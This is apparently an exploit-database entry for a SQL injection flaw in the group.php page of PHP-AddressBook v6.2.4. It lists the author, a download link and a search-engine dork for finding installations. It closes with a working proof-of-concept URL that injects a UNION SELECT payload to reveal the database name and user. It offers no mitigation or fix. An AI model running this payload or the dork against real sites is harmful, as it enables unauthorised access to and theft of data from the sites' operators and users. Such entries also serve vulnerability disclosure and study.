ExploitFixes
PHP-AddressBook v6.2.4 (group.php) SQL Injection Vulnerability 2010-12-29 15:15:25

#Exploit Title : PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date : 2010/12/29
#Found : by hiphop
#thanks :silly3r


proof of concept:

Condition: magic_quotes_gpc = off

http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'